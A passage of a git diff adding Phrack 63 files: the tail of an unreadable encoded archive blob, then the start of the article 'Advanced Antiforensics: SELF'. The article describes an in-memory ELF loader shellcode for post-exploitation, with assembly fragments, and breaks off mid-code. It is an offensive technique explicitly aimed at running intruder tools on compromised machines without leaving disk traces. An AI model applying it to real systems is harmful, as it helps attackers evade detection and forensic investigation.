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
+====
+
+|=[ EOF ]=---------------------------------------------------------------=|
diff --git a/phrack63/11.txt b/phrack63/11.txt
new file mode 100644
index 0000000..430555b
--- /dev/null
+++ b/phrack63/11.txt
@@ -0,0 +1,892 @@
+                           ==Phrack Inc.==
+
+              Volume 0x0b, Issue 0x3f, Phile #0x0b of 0x14
+
+|=----------------=[ Advanced Antiforensics : SELF  ]=-------------------=|
+|=-----------------------------------------------------------------------=|
+|=------------------------=[ Pluf & Ripe ]=------------------------------=|
+|=-----------------------[ www.7a69ezine.org ]=--------------------------=|
+
+
+ 1 - Introduction
+ 2 - Userland Execve
+ 3 - Shellcode ELF loader
+ 4 - Design and Implementation
+   4.1 - The lxobject
+     4.1.1 - Static ELF binary
+     4.1.2 - Stack context
+     4.1.3 - Shellcode loader
+   4.2 - The builder
+   4.3 - The jumper
+ 5 - Multiexecution
+   5.1 - Gits
+ 6 - Conclusion
+ 7 - Greetings
+ 8 - References
+ A - Tested systems
+ B - Sourcecode
+
+
+---[ 1 - Introduction
+
+The techniques of remote services' exploitation have made a substantial 
+progress. At the same time, the range of shellcodes have increased and
+incorporates new and complex anti-detection techniques like polymorphism
+functionalities.
+
+In spite of the advantages that all these give to the attackers, a call to
+the syscall execve is always needed; that ends giving rise to a series of 
+problems:
+
+ - The access to the syscall execve may be denied if the host uses some 
+   kind of modern protection system.
+
+ - The call to execve requires the file to execute to be placed in the 
+   hard disk. Consequently, if '/bin/shell' does not exist, which is a
+   common fact in chroot environments, the shellcode will not be executed
+   properly.
+
+ - The host may not have tools that the intruder may need, thus creating
+   the need to upload them, which can leave traces of the intrusion in
+   the disk.
+
+The need of a shellcode that solves them arises. The solution is found in 
+the 'userland exec'.
+
+---[ 2 - Userland Execve
+
+The procedure that allows the local execution of a program avoiding the use
+of the syscall execve is called 'userland exec' or 'userland execve'. 
+It's basically a mechanism that simulates correctly and orderly most of the
+procedures that the kernel follows to load an executable file in memory and 
+start its execution. It can be summarized in just three steps:
+
+ - Load of the binary's required sections into memory.
+ - Initialization of the stack context.
+ - Jump to the entry point (starting point).
+
+The main aim of the 'userland exec' is to allow the binaries to load avoiding
+the use of the syscall execve that the kernel contains, solving the first of
+the problems stated above. At the same time, as it is a specific implementation
+we can adapt its features to our own needs. We'll make it so the ELF file 
+will not be read from the hard disk but from other supports like a socket.
+With this procedure, the other two problems stated before are solved because 
+the file '/bin/sh' doesn't need to be visible by the exploited process but 
+can be read from the net. On the other hand, tools that don't reside in the
+destination host can also be executed. 
+
+The first public implementation of a execve in a user environment was made by
+"the grugq" [1], its codification and inner workings are perfect but it has 
+some disadvantages:
+
+ - Doesn't work for real attacks.
+ - The code is too large and difficult to port.
+
+Thanks to that fact it was decided to put our efforts in developing another
+'userland execve' with the same features but with a simpler codification and 
+oriented to exploits' use. The final result has been the 'shellcode ELF
+loader'.
+
+---[ 3 - Shellcode ELF loader
+
+The shellcode ELF loader or Self is a new and sophisticated post-exploitation
+technique based on the userland execve. It allows the load and execution of 
+a binary ELF file in a remote machine without storing it on disk or modifying
+the original filesystem. The target of the shellcode ELF loader is to provide
+an effective and modern post-exploitation anti-forensic system for exploits 
+combined with an easy use. That is, that an intruder can execute as many 
+applications as he desires.
+
+---[ 4 - Design and Implementation
+
+Obtaining an effective design hasn't been an easy task, different options 
+have been considered and most of them have been dropped. At last, it was 
+selected the most creative design that allows more flexibility, portability 
+and a great ease of use.
+
+The final result is a mix of multiple pieces, independent one of another, 
+that realize their own function and work together in harmony. This pieces 
+are three: the lxobject, the builder and the jumper. These elements will make
+the task of executing a binary in a remote machine quite easy. The lxobject 
+is a special kind of object that contains all the required elements to change
+the original executable of a guest process by a new one. The builder and 
+jumper are the pieces of code that build the lxobject, transfer it from the 
+local machine (attacker) to the remote machine (attacked) and activate it.
+
+As a previous step before the detailed description of the inner details of 
+this technique, it is needed to understand how, when and where it must be 
+used. Here follows a short summary of its common use:
+
+ - 1st round, exploitation of a vulnerable service:
+
+ In the 1st round we have a machine X with a vulnerable service Y. We want to
+ exploit this juicy process so we use the suitable exploit using as payload
+ (shellcode) the jumper. When exploited, the jumper is executed and we're 
+ ready to the next round.
+
+ - 2nd round, execution of a binary:
+ 
+ Here is where the shellcode ELF loader takes part; a binary ELF is selected
+ and the lxobject is constructed. Then, we sent it to the jumper to be 
+ activated. The result is the load and execution of the binary in a remote
+ machine. We win the battle!!
+
+---[ 4.1 - The lxobject
+
+What the hell is that? A lxobject is an selfloadable and autoexecutable 
+object, that is to say, an object specially devised to completely replace the
+original guest process where it is located by a binary ELF file that carries
+and initiates its execution. Each lxobject is built in the intruder machine
+using the builder and it is sent to the attacked machine where the jumper
+receives and activates it.
+
+Therefore, it can be compared to a missile that is sent from a place to the
+impact point, being the explosive charge an executable. This missile is built
+from three assembled parts: a binary static ELF, a preconstructed stack 
+context and a shellcode loader.
+
+---[ 4.1.1 - Static ELF binary
+
+It's the first piece of a lxobject, the binary ELF that must be loaded and
+executed in a remote host. It's just a common executable file, statically
+compiled for the architecture and system in which it will be executed.
+
+It was decided to avoid the use of dynamic executables because it would add
+complexity which isn't needed in the loading code, noticeably raising the 
+rate of possible errors.
+
+---[ 4.1.2 - Stack context
+
+It's the second piece of a lxobject; the stack context that will be needed by
+the binary. Every process has an associated memory segment called stack where
+the functions store its local variables. During the binary load process, the
+kernel fills this section with a series of initial data requited for its
+subsequent execution. We call it 'initial stack context'.
+
+To ease the portability and specially the loading process, a preconstructed
+stack context was adopted. That is to say, it is generated in our machine and
+it is assembled with the binary ELF file. The only required knowledge is the
+format and to add the data in the correct order. To the vast majority of
+UNIX systems it looks like:
+
+
+      .----------------.
+ .--> |   alignment    |             
+ |    |================|
+ |    |     Argc       |            - Arguments (number)
+ |    |----------------|             
+ |    |     Argv[]     | ---.       - Arguments (vector)
+ |    |----------------|    |
+ |    |     Envp[]     | ---|---.   - Environment variables (vector)
+ |    |----------------|    |   |      
+ |    |  argv strings  | <--'   |   
+ |    |----------------|        |   - Argv and envp data (strings)
+ |    |  envp strings  | <------' 
+ |    |================|
+ '--- |   alignment    | ------->   Upper and lower alignments
+      '----------------'
+
+This is the stack context, most reduced and functional available for us. As 
+it can be observed no auxiliary vector has been added because the work with 
+static executables avoids the need to worry about linking. Also, there isn't
+any restriction about the allowed number of arguments and environment 
+variables; a bunch of them can increase the context's size but nothing more.
+
+As the context is built in the attacker machine, that will usually be 
+different from the attacked one; knowledge of the address space in which the 
+stack is placed will be required. This is a process that is automatically
+done and doesn't suppose a problem.
+
+--[ 4.1.3 - Shellcode Loader
+
+This is the third and also the most important part of a lxobject. It's a
+shellcode that must carry on the loading process and execution of a binary
+file. it is really a simple but powerful implementation of userland execve().
+
+The loading process takes the following steps to be completed successfully 
+(x86 32bits):
+
+ * pre-loading: first, the jumper must do some operations before anything 
+   else. It gets the memory address where the lxobject has been previously
+   stored and pushes it into the stack, then it finds the loader code and
+   jumps to it. The loading has begun.
+
+   __asm__(
+           "push %0\n"
+           "jmp *%1"
+           :
+           : "c"(lxobject),"b"(*loader)
+           );
+
+ * loading step 1: scans the program header table and begins to load each
+   PT_LOAD segment. The stack context has its own header, PT_STACK, so when
+   this kind of segment is found it will be treated differently from the 
+   rest (step 2)
+
+   .loader_next_phdr:
+        // Check program header type (eax): PT_LOAD or PT_STACK
+        movl    (%edx),%eax
+
+        // If program header type is PT_LOAD, jump to .loader_phdr_load
+        // and load the segment referenced by this header
+        cmpl    $PT_LOAD,%eax
+        je      .loader_phdr_load
+
+        // If program header type is PT_STACK, jump to .loader_phdr_stack
+        // and load the new stack segment
+        cmpl    $PT_STACK,%eax
+        je      .loader_phdr_stack
+
+        // If unknown type, jump to next header
+        addl    $PHENTSIZE,%edx
+        jmp     .loader_next_phdr
+
+    For each PT_LOAD segment (text/data) do the following:
+
+  * loading step 1.1: unmap the old segment, one page a time, to be sure that
+    there is enough room to fit the new one:
+
+        movl    PHDR_VADDR(%edx),%edi
+        movl    PHDR_MEMSZ(%edx),%esi
+        subl    $PG_SIZE,%esi
+        movl    $0,%ecx
+    .loader_unmap_page:
+        pushl   $PG_SIZE
+        movl    %edi,%ebx
+        andl    $0xfffff000,%ebx
+        addl    %ecx,%ebx
+        pushl   %ebx
+        pushl   $2
+        movl    $SYS_munmap,%eax
+        call    do_syscall
+        addl    $12,%esp
+        addl    $PG_SIZE,%ecx
+        cmpl    %ecx,%esi
+        jge     .loader_unmap_page
+
+  * loading step 1.2: map the new memory region.
+
+        pushl   $0
+        pushl   $0
+        pushl   $-1
+        pushl   $MAPS
+        pushl   $7
+        movl    PHDR_MEMSZ(%edx),%esi
+        pushl   %esi
+        movl    %edi,%esi
+        andl    $0xffff000,%esi
+        pushl   %esi
+        pushl   $6
+        movl    $SYS_mmap,%eax
+        call    do_syscall
+        addl    $32,%esp
+  
+  * loading step 1.3: copy the segment from the lxobject to that place:
+
+        movl    PHDR_FILESZ(%edx),%ecx
+        movl    PHDR_OFFSET(%edx),%esi
+        addl    %ebp,%esi
+        repz    movsb
+
+  * loading step 1.4: continue with next header:
+
+        addl    $PHENTSIZE,%edx
+        jmp     .loader_next_phdr
+
+ * loading step 2: when both text and data segments have been loaded 
+   correctly, it's time to setup a new stack:
+
+   .loader_phdr_stack:
+        movl    PHDR_OFFSET(%edx),%esi
+        addl    %ebp,%esi
+        movl    PHDR_VADDR(%edx),%edi
